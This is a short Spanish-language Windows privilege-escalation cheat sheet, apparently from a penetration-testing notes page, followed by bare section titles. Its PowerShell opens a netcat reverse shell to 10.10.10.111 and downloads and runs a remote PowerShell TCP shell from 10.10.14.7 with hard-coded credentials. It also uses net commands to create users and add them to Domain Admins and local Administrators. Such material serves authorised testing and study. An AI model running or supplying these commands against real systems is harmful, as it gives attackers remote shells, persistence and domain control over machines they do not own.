Windows Privilege Escalation
Obtener shell reverse con otro usuario teniendo sus credenciales por medio de un script.ps1
## DOMINIO ##
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "Bethany"
[System.Diagnostics.Process]::Start("C:\Users\Public\Downloads\nc.exe","10.10.10.111 5555 -e C:\Windows\system32\cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
## LOCALMENTE PSREMOTING ##
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1') } -Credential $cred -Computer localhostCreacion de usuarios con NET
# Listado de usuarios y grupos
net user
net group
net localgroup
# Creacion de Usuario en Domain Controller
net user gerh Tomas123 /add /domain
net group "Domain Admins" gerh /add /domain
# Creacion de Usuario en localgroup
net user gerh Pass123 /add
net localgroup Administrators gerh /add
net localgroup "Remote Desktop Users" gerh /add
net localgroup "Remote Management Users" gerh /add Impersonating Privileges with Juicy Potato
Compilación de Exploits con mingw32-gcc
Escalación de privilegios dentro de un Active Directory por medio de un usuario del grupo DNSAdmins
Por medio de windows-exploit-suggester.py
Validacion de la arquitectura de windows con powershell
Última actualización